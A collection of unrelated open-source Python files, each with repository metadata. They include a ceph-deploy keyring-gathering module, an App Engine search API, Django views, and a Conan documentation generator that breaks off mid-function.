        loader.get_from_path.side_effect = [
            ValueError("OH NOES! There's a problem in Düsseldorf!"),
            ValueError("OH NOES! There's a problem in Düsseldorf!")]
        crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
        out = crawler.get_tags()
        assert 0 == len(out)

    def test_get_tags_success(self):
        """Test tags can be crawled when tags are able to be loaded correctly"""
        loader = mock.Mock(spec=avalon.tags.read.MetadataLoader)
        files = ['path.ogg', 'path2.ogg']
        # Loader succeeds (returns None) for both files -> two results.
        loader.get_from_path.side_effect = [None, None]
        crawler = avalon.tags.crawl.TagCrawler(loader, 'music', DummyWalk(files))
        out = crawler.get_tags()
        assert 2 == len(out)
|
{
"content_hash": "d38f98cbf7bb9a7a7ff39100a4acf534",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 97,
"avg_line_length": 36.493975903614455,
"alnum_prop": 0.6368438428524266,
"repo_name": "tshlabs/avalonms",
"id": "d9ddd7ebf5f55f7d43b9003093b86510add85872",
"size": "3060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_tag_crawl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "244058"
}
],
"symlink_target": ""
}
|
from pylons.util import _
from formencode import Schema, validators, ForEach, All
from ispmanccp.models.validators import *
__all__ = ['AccountUpdate', 'AccountDelete', 'AccountCreate']
try:
    import DNS
    dns_available = True
except ImportError:
    # pyDNS is optional: without it, the email validators below skip
    # MX/domain resolution (resolve_domain=False).
    dns_available = False
class AccountUpdate(Schema):
    """FormEncode schema validating the 'update account' form.

    Mirrors AccountCreate minus ispmanUserId.  Extra submitted fields
    are accepted and silently dropped (allow_extra_fields +
    filter_extra_fields).
    """
    allow_extra_fields = True
    filter_extra_fields = True
    ispmanDomain = validators.UnicodeString(not_empty=True, encoding='UTF-8')
    uid = validators.UnicodeString(not_empty=True, encoding='UTF-8')
    givenName = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
    sn = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
    userPassword = SecurePassword(
        not_empty=True, strip=True,
        messages={'empty': _("Please enter a value or click button to restore password")}
    )
    userPasswordConfirm = PasswordsMatch(not_empty=False, strip=True)
    FTPQuotaMBytes = validators.Int(not_empty=False, strip=True)
    FTPStatus = validators.OneOf([u'enabled', u'disabled'])
    mailQuota = validators.Int(not_empty=False, strip=True)
    mailAlias = ForEach(ValidMailAlias(not_empty=True, strip=True))
    # Domain resolution only when pyDNS imported cleanly (module top).
    mailForwardingAddress = ForEach(
        validators.Email(not_empty=True,
                         strip=True,
                         resolve_domain=dns_available)
    )
    ForwardingOnly = ForwardingOnlyValidator(not_empty=True)
class AccountDelete(Schema):
    """FormEncode schema for the 'delete account' form: domain and uid only."""
    allow_extra_fields = True
    filter_extra_fields = True
    ispmanDomain = validators.UnicodeString(not_empty=True, encoding='UTF-8')
    uid = validators.UnicodeString(not_empty=True, encoding='UTF-8')
class AccountCreate(Schema):
    """FormEncode schema validating the 'create account' form.

    Like AccountUpdate but additionally requires a unique ispmanUserId
    and omits the password-confirmation / forwarding-only fields.
    """
    allow_extra_fields = True
    filter_extra_fields = True
    ispmanDomain = validators.UnicodeString(not_empty=True, encoding='UTF-8')
    uid = validators.UnicodeString(not_empty=True, encoding='UTF-8')
    givenName = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
    sn = CorrectNamesValidator(not_empty=True, strip=True, encoding='UTF-8')
    userPassword = SecurePassword(
        not_empty=True, strip=True,
        messages={'empty': _("Please enter a value or click button to regenerate password")}
    )
    ispmanUserId = UniqueUserId(not_empty=True, strip=True, encoding='UTF-8')
    FTPQuotaMBytes = validators.Int(not_empty=False, strip=True)
    FTPStatus = validators.OneOf([u'enabled', u'disabled'])
    mailQuota = validators.Int(not_empty=False, strip=True)
    mailAlias = ForEach(ValidMailAlias(not_empty=True, strip=True))#, unique=True)
    # Domain resolution only when pyDNS imported cleanly (module top).
    mailForwardingAddress = ForEach(
        validators.Email(not_empty=True,
                         strip=True,
                         resolve_domain=dns_available)
    )
|
{
"content_hash": "314127de326edde66f2d48dacf063838",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 92,
"avg_line_length": 42.10769230769231,
"alnum_prop": 0.6945560833028863,
"repo_name": "UfSoft/python-perl",
"id": "407ac48232cb38f613de1a6061d60dcbad837265",
"size": "3520",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ispmanccp/models/accounts.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "76401"
},
{
"name": "C++",
"bytes": "361"
},
{
"name": "CSS",
"bytes": "9225"
},
{
"name": "HTML",
"bytes": "44331"
},
{
"name": "JavaScript",
"bytes": "4229"
},
{
"name": "Perl",
"bytes": "36737"
},
{
"name": "Prolog",
"bytes": "4319"
},
{
"name": "Python",
"bytes": "118494"
}
],
"symlink_target": ""
}
|
import os.path
import logging
import json
import tempfile
import shutil
import time
from ceph_deploy import hosts
from ceph_deploy.cliutil import priority
from ceph_deploy.lib import remoto
import ceph_deploy.util.paths.mon
LOG = logging.getLogger(__name__)
def _keyring_equivalent(keyring_one, keyring_two):
    """
    Check two keyrings are identical
    """

    def _extract_key(file_path):
        """
        Return the cephx secret from a keyring file.  Keyring files may
        or may not have whitespace before some lines and may quote some
        values, so the safe comparison is by extracted key.
        """
        with open(file_path) as fp:
            for raw_line in fp:
                stripped = raw_line.strip()
                if not stripped:
                    continue
                parts = stripped.split('=')
                if parts[0].strip() == 'key':
                    return "=".join(parts[1:]).strip()
        raise RuntimeError("File '%s' is not a keyring" % file_path)

    return _extract_key(keyring_one) == _extract_key(keyring_two)
def keytype_path_to(args, keytype):
    """
    Get the local filename for a keyring type
    """
    if keytype == "admin":
        template = '{cluster}.client.admin.keyring'
    elif keytype == "mon":
        template = '{cluster}.mon.keyring'
    else:
        # Everything else is a bootstrap keyring named after its type.
        template = '{cluster}.bootstrap-{what}.keyring'
    return template.format(cluster=args.cluster, what=keytype)
def keytype_identity(keytype):
    """
    Get the keyring identity from keyring type.

    This is used in authentication with keyrings and generating keyrings.
    Returns None for an unknown keytype.
    """
    if keytype == 'admin':
        return 'client.admin'
    if keytype == 'mon':
        return 'mon.'
    if keytype in ('mds', 'osd', 'rgw'):
        return 'client.bootstrap-%s' % keytype
    return None
def keytype_capabilities(keytype):
    """
    Get the capabilities of a keyring from keyring type.

    Returns the flat [entity, caps, ...] argument list understood by
    'ceph auth get-or-create', or None for an unknown keytype.
    """
    if keytype == 'admin':
        return [
            'osd', 'allow *',
            'mds', 'allow *',
            'mon', 'allow *'
        ]
    if keytype in ('mds', 'osd', 'rgw'):
        return ['mon', 'allow profile bootstrap-%s' % keytype]
    return None
def gatherkeys_missing(args, distro, rlogger, keypath, keytype, dest_dir):
    """
    Get or create the keyring from the mon using the mon keyring by keytype and
    copy to dest_dir
    """
    arguments = [
        '/usr/bin/ceph',
        '--connect-timeout=25',
        '--cluster={cluster}'.format(
            cluster=args.cluster),
        # Authenticate as the monitor itself, using its own keyring.
        '--name', 'mon.',
        '--keyring={keypath}'.format(
            keypath=keypath),
        'auth', 'get-or-create',
    ]
    identity = keytype_identity(keytype)
    if identity is None:
        raise RuntimeError('Could not find identity for keytype:%s' % keytype)
    arguments.append(identity)
    capabilites = keytype_capabilities(keytype)
    if capabilites is None:
        raise RuntimeError('Could not find capabilites for keytype:%s' % keytype)
    arguments.extend(capabilites)
    # Run the command on the remote host; out/err are byte-line sequences.
    out, err, code = remoto.process.check(
        distro.conn,
        arguments
    )
    if code != 0:
        rlogger.error('"ceph auth get-or-create for keytype %s returned %s', keytype, code)
        for line in err:
            rlogger.debug(line)
        return False
    # Write the keyring we got back into dest_dir under its local name.
    keyring_name_local = keytype_path_to(args, keytype)
    keyring_path_local = os.path.join(dest_dir, keyring_name_local)
    with open(keyring_path_local, 'wb') as f:
        for line in out:
            f.write(line + b'\n')
    return True
def gatherkeys_with_mon(args, host, dest_dir):
    """
    Connect to mon and gather keys if mon is in quorum.

    Copies the mon keyring from 'host' into dest_dir, verifies via the
    mon's admin socket that it is part of the quorum, then fetches (or
    creates) the admin/mds/osd/rgw keyrings.  Returns True only when
    every keyring was retrieved.
    """
    distro = hosts.get(host, username=args.username)
    remote_hostname = distro.conn.remote_module.shortname()
    dir_keytype_mon = ceph_deploy.util.paths.mon.path(args.cluster, remote_hostname)
    path_keytype_mon = "%s/keyring" % (dir_keytype_mon)
    mon_key = distro.conn.remote_module.get_file(path_keytype_mon)
    if mon_key is None:
        LOG.warning("No mon key found in host: %s", host)
        return False
    mon_name_local = keytype_path_to(args, "mon")
    mon_path_local = os.path.join(dest_dir, mon_name_local)
    with open(mon_path_local, 'wb') as f:
        f.write(mon_key)
    rlogger = logging.getLogger(host)
    path_asok = ceph_deploy.util.paths.mon.asok(args.cluster, remote_hostname)
    # Query the mon through its admin socket so this works even before
    # client authentication is usable.
    out, err, code = remoto.process.check(
        distro.conn,
        [
            "/usr/bin/ceph",
            "--connect-timeout=25",
            "--cluster={cluster}".format(
                cluster=args.cluster),
            "--admin-daemon={asok}".format(
                asok=path_asok),
            "mon_status"
        ]
    )
    if code != 0:
        rlogger.error('"ceph mon_status %s" returned %s', host, code)
        for line in err:
            rlogger.debug(line)
        return False
    try:
        mon_status = json.loads(b''.join(out).decode('utf-8'))
    except ValueError:
        rlogger.error('"ceph mon_status %s" output was not json', host)
        for line in out:
            rlogger.error(line)
        return False
    mon_number = None
    mon_map = mon_status.get('monmap')
    if mon_map is None:
        rlogger.error("could not find mon map for mons on '%s'", host)
        return False
    mon_quorum = mon_status.get('quorum')
    if mon_quorum is None:
        rlogger.error("could not find quorum for mons on '%s'", host)
        return False
    mon_map_mons = mon_map.get('mons')
    if mon_map_mons is None:
        rlogger.error("could not find mons in monmap on '%s'", host)
        return False
    # Resolve this host's rank in the mon map...
    for mon in mon_map_mons:
        if mon.get('name') == remote_hostname:
            mon_number = mon.get('rank')
            break
    if mon_number is None:
        rlogger.error("could not find '%s' in monmap", remote_hostname)
        return False
    # ...and require that rank to be in the current quorum.
    if mon_number not in mon_quorum:
        rlogger.error("Not yet quorum for '%s'", host)
        return False
    for keytype in ["admin", "mds", "osd", "rgw"]:
        if not gatherkeys_missing(args, distro, rlogger, path_keytype_mon, keytype, dest_dir):
            # We will return failure if we fail to gather any key
            # BUG FIX: the format string had one placeholder for two
            # arguments, making logging raise an internal formatting
            # error instead of emitting the message.
            rlogger.error("Failed to return '%s' key from host %s", keytype, host)
            return False
    return True
def gatherkeys(args):
    """
    Gather keys from any mon and store in current working directory.

    Backs up keys from previous installs and stores new keys.

    Raises RuntimeError when no mon can be reached or when any keyring
    type could not be retrieved.
    """
    # Keyrings are secrets: restrict permissions on everything we create.
    oldmask = os.umask(0o77)
    try:
        try:
            tmpd = tempfile.mkdtemp()
            LOG.info("Storing keys in temp directory %s", tmpd)
            success = False
            for host in args.mon:
                success = gatherkeys_with_mon(args, host, tmpd)
                if success:
                    break
            if not success:
                LOG.error("Failed to connect to host:%s", ', '.join(args.mon))
                raise RuntimeError('Failed to connect any mon')
            had_error = False
            date_string = time.strftime("%Y%m%d%H%M%S")
            for keytype in ["admin", "mds", "mon", "osd", "rgw"]:
                filename = keytype_path_to(args, keytype)
                tmp_path = os.path.join(tmpd, filename)
                if not os.path.exists(tmp_path):
                    # Typo fix in the log message ("retrived").
                    LOG.error("No key retrieved for '%s'", keytype)
                    had_error = True
                    continue
                if not os.path.exists(filename):
                    LOG.info("Storing %s" % (filename))
                    shutil.move(tmp_path, filename)
                    continue
                if _keyring_equivalent(tmp_path, filename):
                    LOG.info("keyring '%s' already exists", filename)
                    continue
                # Same filename but a different key: keep the old one,
                # timestamped, before replacing it.
                backup_keyring = "%s-%s" % (filename, date_string)
                LOG.info("Replacing '%s' and backing up old key as '%s'", filename, backup_keyring)
                shutil.copy(filename, backup_keyring)
                shutil.move(tmp_path, filename)
            if had_error:
                raise RuntimeError('Failed to get all key types')
        finally:
            LOG.info("Destroy temp directory %s" % (tmpd))
            shutil.rmtree(tmpd)
    finally:
        os.umask(oldmask)
@priority(40)
def make(parser):
    """
    Gather authentication keys for provisioning new nodes.
    """
    # At least one monitor hostname is required; hosts are tried in
    # order until one yields all keyrings (see gatherkeys()).
    parser.add_argument(
        'mon',
        metavar='HOST',
        nargs='+',
        help='monitor host to pull keys from',
    )
    parser.set_defaults(
        func=gatherkeys,
    )
|
{
"content_hash": "0228a26fc7df2814cada00e764558746",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 99,
"avg_line_length": 33.60820895522388,
"alnum_prop": 0.5620073276340624,
"repo_name": "SUSE/ceph-deploy",
"id": "656e89c614eab22c1a25bace02618a9502ee673e",
"size": "9007",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ceph_deploy/gatherkeys.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "392237"
},
{
"name": "Shell",
"bytes": "8614"
}
],
"symlink_target": ""
}
|
import argparse
import webdavtools
parser = argparse.ArgumentParser(description='WebDav upload processing.')

# List of files (required)
parser.add_argument( 'files',
                     metavar='File',
                     type=str,
                     nargs='+',
                     help='Multiple files, source and target divided by a colon '
                          'from:to. Directories have to end with a slash. File '
                          'patterns are allowed. Example: ~/Desktop/test/*.txt:/test/ '
                          '(will copy all txt-files from folder ~/Desktop/test/ to '
                          '/test/ on the WebDav server.')

# The url (required)
parser.add_argument( '--url',
                     dest='url',
                     help='The URL.',
                     required=True)

# Username (optional)
parser.add_argument( '--username',
                     dest='username',
                     help='The username.')

# Password (optional)
parser.add_argument( '--password',
                     dest='password',
                     help='The password.')

# Parse all arguments. Will be available in the "args" namespace
args = parser.parse_args()

# Connect to WebDav with given credentials
webDavTools = webdavtools.WebDavTools()
webDavTools.connect(args.url, args.username, args.password)

# Upload files
for sourceAndTarget in args.files:
    # Files have to be devided by ":", e.g. "/my/local/file/from.txt:/my/remote/file/to.txt"
    # NOTE(review): a ':' inside either path (Windows drive letters, URLs)
    # makes this split produce more than 2 parts and abort -- confirm
    # only POSIX-style paths are expected here.
    sourceAndTargetSplitted = sourceAndTarget.split(':')
    if len(sourceAndTargetSplitted) != 2:
        raise Exception("Invalid file argument!")
    source = sourceAndTargetSplitted[0]
    target = sourceAndTargetSplitted[1]
    webDavTools.upload(source, target)
|
{
"content_hash": "3c3f65f3635d02e71254b5d6118c084c",
"timestamp": "",
"source": "github",
"line_count": 51,
"max_line_length": 92,
"avg_line_length": 35.431372549019606,
"alnum_prop": 0.5683453237410072,
"repo_name": "thorbenegberts/webdav-tools",
"id": "9b7ee8a43d5540f9748c8f6591e39e20a22ed663",
"size": "1807",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "webdav_upload.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3886"
}
],
"symlink_target": ""
}
|
import glanceclient.exc as glance_exceptions
from keystoneclient import exceptions as keystone_exceptions
from novaclient import exceptions as nova_exceptions
from quantumclient.common import exceptions as quantum_exceptions
from swiftclient import client as swift_exceptions
from cinderclient import exceptions as cinder_exceptions
from .utils import TestDataContainer
def create_stubbed_exception(cls, status_code=500):
    """Patch 'cls' with stub dunders and return an instance of it.

    The returned exception carries the given status code and a fixed
    "Expected failure." message; logging for it is silenced.
    """
    failure_msg = "Expected failure."

    def _init(self, code, message, **kwargs):
        self.code = code
        self.message = message

    def _str(self):
        return str(self.message)

    def _unicode(self):
        return unicode(self.message)

    cls.__init__ = _init
    cls.__str__ = _str
    cls.__unicode__ = _unicode
    cls.silence_logging = True
    return cls(status_code, failure_msg)
def data(TEST):
    """Attach one stubbed exception instance per client library to TEST.

    Each instance is built by create_stubbed_exception(), so it carries
    .code/.message and the fixed "Expected failure." text.
    """
    TEST.exceptions = TestDataContainer()
    unauth = keystone_exceptions.Unauthorized
    TEST.exceptions.keystone_unauthorized = create_stubbed_exception(unauth)

    keystone_exception = keystone_exceptions.ClientException
    TEST.exceptions.keystone = create_stubbed_exception(keystone_exception)

    nova_exception = nova_exceptions.ClientException
    TEST.exceptions.nova = create_stubbed_exception(nova_exception)

    glance_exception = glance_exceptions.ClientException
    TEST.exceptions.glance = create_stubbed_exception(glance_exception)

    quantum_exception = quantum_exceptions.QuantumClientException
    TEST.exceptions.quantum = create_stubbed_exception(quantum_exception)

    swift_exception = swift_exceptions.ClientException
    TEST.exceptions.swift = create_stubbed_exception(swift_exception)

    cinder_exception = cinder_exceptions.BadRequest
    TEST.exceptions.cinder = create_stubbed_exception(cinder_exception)
|
{
"content_hash": "43508c6504c95ee3be7284ef814f663a",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 76,
"avg_line_length": 34.490566037735846,
"alnum_prop": 0.7603938730853391,
"repo_name": "99cloud/keystone_register",
"id": "9f58692033738ff266a9b25ef9e8001216729409",
"size": "2433",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "openstack_dashboard/test/test_data/exceptions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "268926"
},
{
"name": "Python",
"bytes": "1535870"
},
{
"name": "Shell",
"bytes": "12674"
}
],
"symlink_target": ""
}
|
import json
import logging
import urlparse
from google.appengine.api import search
try:
    from config import secret_token
except ImportError:
    # No local config deployed: mutating endpoints will reject every token.
    secret_token = ''

# Full-text search index holding one document per nut package.
INDEX = search.Index(name="nuts")

# Sentinel meaning "the check passed and no HTTP response was written".
NO_RESPONSE_SENT = object()
def send_json(start_response, status, headers, data):
    """Serialize 'data' as JSON, emit the WSGI headers, return the body."""
    if data is None:
        body = ''
    else:
        body = json.dumps(data)
    headers.append(("Content-Type", "application/json"))
    headers.append(("Content-Length", str(len(body))))
    start_response(status, headers)
    return body
def check_method(environ, start_response, expected_method):
    """Allow the request through only if it uses *expected_method*.

    Returns NO_RESPONSE_SENT when the method matches; otherwise sends a
    405 response (with an Allow header) and returns its body.
    """
    actual = environ["REQUEST_METHOD"].upper()
    if actual == expected_method:
        return NO_RESPONSE_SENT
    message = {"Message": "405 Method Not Allowed: use %s" % expected_method}
    return send_json(start_response, "405 Method Not Allowed",
                     [("Allow", expected_method)], message)
def check_secret_token(environ, start_response):
    """Allow the request through only if it carries the correct secret token.

    Returns NO_RESPONSE_SENT on success; otherwise sends a 403 response
    and returns its body.
    """
    try:
        supplied = urlparse.parse_qs(environ["QUERY_STRING"])["token"][0]
        if supplied != secret_token:
            # Funnel a mismatched token through the same error path as a
            # missing one.
            raise KeyError(supplied)
    except (KeyError, IndexError) as e:
        logging.warning("Bad token: %r", e)
        body = {"Message": "403 Forbidden: bad token"}
        return send_json(start_response, "403 Forbidden", [], body)
    return NO_RESPONSE_SENT
def find(environ, start_response):
    """Search nuts (GET, query parameter ``q``).

    Responds with JSON shaped like::

        {"Nuts": [{"Vendor": "aleksi", "Name": "test_nut1", "Rank": ...}],
         "Message": "OK"}
    """
    method_error = check_method(environ, start_response, "GET")
    if method_error is not NO_RESPONSE_SENT:
        return method_error
    try:
        query = urlparse.parse_qs(environ["QUERY_STRING"])["q"][0]
    except (KeyError, IndexError) as e:
        logging.warning("Bad request: %r", e)
        return send_json(start_response, "400 Bad Request", [],
                         {"Message": "400 Bad Request: %r" % e})
    nuts = []
    for hit in INDEX.search(query):
        # Flatten each search document into a plain dict, keeping its rank.
        entry = {"Rank": hit.rank}
        for field in hit.fields:
            entry[field.name] = field.value
        nuts.append(entry)
    return send_json(start_response, "200 OK", [],
                     {"Nuts": nuts, "Message": "OK"})
def add(environ, start_response):
    """Add a nut to the search index (POST, token-protected).

    Expects a JSON body like::

        {"Nut": {"Vendor": "aleksi",
                 "Name": "test_nut1",
                 "Doc": "Package test_nut1 is used to test nut."}}
    """
    error = check_method(environ, start_response, "POST")
    if error is NO_RESPONSE_SENT:
        error = check_secret_token(environ, start_response)
    if error is not NO_RESPONSE_SENT:
        return error
    payload = json.load(environ["wsgi.input"])
    logging.info("Adding %r", payload)
    nut = payload["Nut"]
    vendor = nut["Vendor"]
    name = nut["Name"]
    doc = nut["Doc"]
    # Trim the conventional godoc-style "Package <name> " prefix and a
    # trailing period from the description.
    if doc.lower().startswith("package %s " % name.lower()):
        doc = doc.split(" ", 2)[2]
    if doc.endswith("."):
        doc = doc[:-1]
    # TODO rank
    document = search.Document(
        doc_id="%s/%s" % (vendor, name),
        fields=[
            search.TextField(name="Vendor", value=vendor),
            search.TextField(name="Name", value=name),
            search.TextField(name="Doc", value=doc),
        ])
    INDEX.put(document)
    return send_json(start_response, "201 Created", [], {"Message": "OK"})
def remove(environ, start_response):
    """Remove a nut from the search index (POST, token-protected).

    Expects a JSON body like::

        {"Nut": {"Vendor": "aleksi", "Name": "test_nut1"}}
    """
    error = check_method(environ, start_response, "POST")
    if error is NO_RESPONSE_SENT:
        error = check_secret_token(environ, start_response)
    if error is not NO_RESPONSE_SENT:
        return error
    payload = json.load(environ["wsgi.input"])
    logging.info("Removing %r", payload)
    nut = payload["Nut"]
    # Document ids are "<vendor>/<name>", matching add().
    INDEX.delete("%s/%s" % (nut["Vendor"], nut["Name"]))
    return send_json(start_response, '204 No Content', [], None)
def remove_all(environ, start_response):
    """Delete every document from the search index, one batch per pass."""
    doc_ids = [d.doc_id for d in INDEX.get_range(ids_only=True)]
    while doc_ids:
        logging.info("Removing IDs %r", doc_ids)
        INDEX.delete(doc_ids)
        # get_range pages through the index; loop until it comes back empty.
        doc_ids = [d.doc_id for d in INDEX.get_range(ids_only=True)]
    return send_json(start_response, '204 No Content', [], None)
|
{
"content_hash": "b5c37a8b87e811b630715066ee3a0c88",
"timestamp": "",
"source": "github",
"line_count": 171,
"max_line_length": 106,
"avg_line_length": 26.07017543859649,
"alnum_prop": 0.5708838043965904,
"repo_name": "AlekSi/search.gonuts.io",
"id": "649d047154cb2d93357ba739f273a95a3e491bcb",
"size": "4458",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "search.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "4458"
}
],
"symlink_target": ""
}
|
from django.shortcuts import get_object_or_404
from django.views.generic import list_detail
from libros.bookreader.models import Collection
def browse(request, **kwargs):
    """List all collections via Django's generic object_list view.

    Callers may override the queryset or template context name through
    keyword arguments; sensible defaults are filled in otherwise.
    """
    kwargs.setdefault('queryset', Collection.objects.all())
    kwargs.setdefault('template_object_name', 'collection')
    return list_detail.object_list(request, **kwargs)
def view(request, object_id, **kwargs):
    """Show one collection's books via the generic object_list view.

    Raises Http404 when no Collection with the given pk exists. The
    collection itself is exposed to the template as extra context.
    """
    collection = get_object_or_404(Collection, pk=object_id)
    defaults = {
        'template_object_name': 'book',
        'template_name': 'bookreader/collection_detail.html',
        'queryset': collection.books.all(),
    }
    for key, value in defaults.items():
        kwargs.setdefault(key, value)
    # Reuse a caller-supplied extra_context dict when present.
    kwargs.setdefault('extra_context', {})['collection'] = collection
    return list_detail.object_list(request, **kwargs)
|
{
"content_hash": "793071f64f2d425b86bcedc089843d8b",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 75,
"avg_line_length": 36.31818181818182,
"alnum_prop": 0.7296620775969962,
"repo_name": "Early-Modern-OCR/Cobre",
"id": "52c708209287870cdd2b7eff8f82d2c4e88df735",
"size": "799",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libros/bookreader/views/collection.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "101965"
},
{
"name": "HTML",
"bytes": "129761"
},
{
"name": "JavaScript",
"bytes": "233511"
},
{
"name": "Python",
"bytes": "219455"
}
],
"symlink_target": ""
}
|
# Blank the Sense HAT's 8x8 LED matrix.
from sense_hat import SenseHat
from time import sleep  # NOTE(review): imported but unused in this script
sense = SenseHat()
sense.clear()  # clear() with no arguments turns every pixel off
|
{
"content_hash": "e1c5ecdcf4762e3b56edd9d49b543e1b",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 30,
"avg_line_length": 14.833333333333334,
"alnum_prop": 0.7640449438202247,
"repo_name": "claremacrae/raspi_code",
"id": "9d3bcd8349d101063fcccb536acc5ae66f8d92ba",
"size": "194",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hardware/sense_hat/turn_off_lights.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "MATLAB",
"bytes": "61"
},
{
"name": "Mathematica",
"bytes": "435"
},
{
"name": "Python",
"bytes": "33532"
},
{
"name": "Shell",
"bytes": "10124"
}
],
"symlink_target": ""
}
|
from django.conf.urls import include, url
from viewflow.flow.viewset import FlowViewSet
from . import flows, views
# URL routes for the submission app. Order matters: the explicit
# "next task" redirect must be matched before the catch-all viewset prefix.
urlpatterns = [
    # Jump from a given process/task pair straight to the next task.
    url(
        r'^(?P<process_pk>\d+)/(?P<task_pk>\d+)/next/$',
        views.NextTaskRedirectView.as_view(),
        name='next_task'
    ),
    # All standard viewflow URLs for the SubmissionFlow.
    url(
        r'^',
        include(FlowViewSet(flows.SubmissionFlow).urls),
    ),
]
|
{
"content_hash": "34c998e0c9cce6ed657c9ac0db778a9e",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 56,
"avg_line_length": 21.58823529411765,
"alnum_prop": 0.5994550408719346,
"repo_name": "Candihub/pixel",
"id": "aa1a07292fd4f8f8579befa8b08bbc9d3c9fbcaf",
"size": "367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "apps/submission/urls.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "15017"
},
{
"name": "Dockerfile",
"bytes": "1819"
},
{
"name": "HTML",
"bytes": "58864"
},
{
"name": "JavaScript",
"bytes": "1180"
},
{
"name": "Makefile",
"bytes": "4184"
},
{
"name": "Python",
"bytes": "414705"
},
{
"name": "R",
"bytes": "3817"
},
{
"name": "Shell",
"bytes": "2928"
}
],
"symlink_target": ""
}
|
import os
import platform
import subprocess
import sys
# Documentation category for each conan sub-command; the category is also
# the sub-directory under reference/commands/ holding the command's .rst file.
folder = {
    "install": "consumer",
    "config": "consumer",
    "get": "consumer",
    "info": "consumer",
    "search": "consumer",
    "new": "creator",
    "create": "creator",
    "upload": "creator",
    "export": "creator",
    "export-pkg": "creator",
    "test": "creator",
    "source": "development",
    "build": "development",
    "package": "development",
    "editable": "development",
    "workspace": "development",
    "profile": "misc",
    "remote": "misc",
    "user": "misc",
    "imports": "misc",
    "copy": "misc",
    "remove": "misc",
    "alias": "misc",
    "download": "misc",
    "inspect": "misc",
    "help": "misc",
    "lock": "misc",
}
# Commands whose docs get an "experimental" warning banner.
experimental = ["inspect"]
commands = list(folder)
# The conan executable to invoke; overridable as the first CLI argument.
# (Replaces a dead "" pre-assignment plus try/except IndexError.)
conan_name = sys.argv[1] if len(sys.argv) > 1 else "conan"
# reST skeleton: {0}=command, {1}=underline, {2}=experimental banner,
# {3}=usage, {4}=description, {5}=argument listing.
template = """.. _conan_{0}:
conan {0}
======{1}
{2}
.. code-block:: bash
    $ {3}
{4}
.. code-block:: text
{5}"""
# For every command, capture "<conan> <command> -h", carve the output into
# (usage, description, argument listing), render the reST template, and
# splice it into the existing reference/commands/<category>/<command>.rst.
for command in commands:
    execute = [conan_name, command, "-h"]
    print(execute)
    # NOTE(review): str() on check_output()'s bytes presumably yields the
    # "b'...'" repr on Python 3, so newlines survive as the literal two
    # characters "\n" -- the "\\n" splits below depend on that. Confirm
    # which interpreter this script targets before changing it.
    output = str(subprocess.check_output(execute))
    output = output.rstrip()
    # Drop everything before the usage line "conan <command> [-h]".
    search_string = "conan %s [-h]" % command
    output = search_string + output.split(search_string)[1]
    # Split into at most three chunks on escaped blank lines:
    # [0] usage block, [1] description, [2] the rest (argument sections).
    output = output.split("\\r\\n\\r\\n" if platform.system() == "Windows" else "\\n\\n", 2)
    # reST section underline: one "=" per character of the command name.
    underline = ""
    for char in command:
        underline += "="
    # Re-flow the usage block; lines not starting with "conan" are
    # continuation lines and are shifted left by one character.
    small_help = ""
    for line in output[0].replace("\\r", "").replace("\\n", "\n").splitlines():
        if not line.startswith("conan"):
            line = line[1:]
        small_help += "%s\n" % line.rstrip()
    text_help = output[1].replace("\\r", "").replace("\\n", "\n").rstrip()
    # Some commands have a multi-paragraph description: everything before
    # "positional arguments" still belongs to the description text.
    if output[2].startswith("positional arguments"):
        args_text = output[2]
    else:
        tmp = output[2].split("positional arguments")
        text_help += "\n\n" + tmp[0].replace("\\r", "").replace("\\n", "\n").rstrip()
        args_text = "positional arguments" + tmp[1]
    # Build the indented argument listing; lone quote lines (repr
    # artifacts, presumably) are dropped.
    arguments_help = ""
    for line in args_text.replace("\\r", "").replace("\\n", "\n").splitlines():
        if line == "'" or line == "\"":
            continue
        arguments_help += (" %s\n" % line) if line else "\n"
    arguments_help = arguments_help.rstrip()
    print(arguments_help)
    text_experimental = """
.. warning::
    This is an **experimental** feature subject to breaking changes in future releases.
""" if command in experimental else ""
    text = template.format(command, underline, text_experimental, small_help, text_help,
                           arguments_help)
    text = text.replace("\\'", "\'")
    filepath = os.path.join(os.path.dirname(os.path.realpath(__file__)), "reference", "commands",
                            folder[command], command)
    print("filepath:", filepath)
    the_file = open("%s.rst" % filepath, "r")
    content = the_file.read()
    the_file.close()
    the_file = open("%s.rst" % filepath, "w")
    separator = "\n\n\n"
    # Keep any hand-written preamble that precedes the generated anchor.
    begin = content.find(".. _conan_%s" % command) # To avoid deleting ..spelling:: and other stuff
    prev_content = content[0:begin]
    rest_content = content[begin + 1:]
    if rest_content:
        rest_content = rest_content.split(separator, 1)
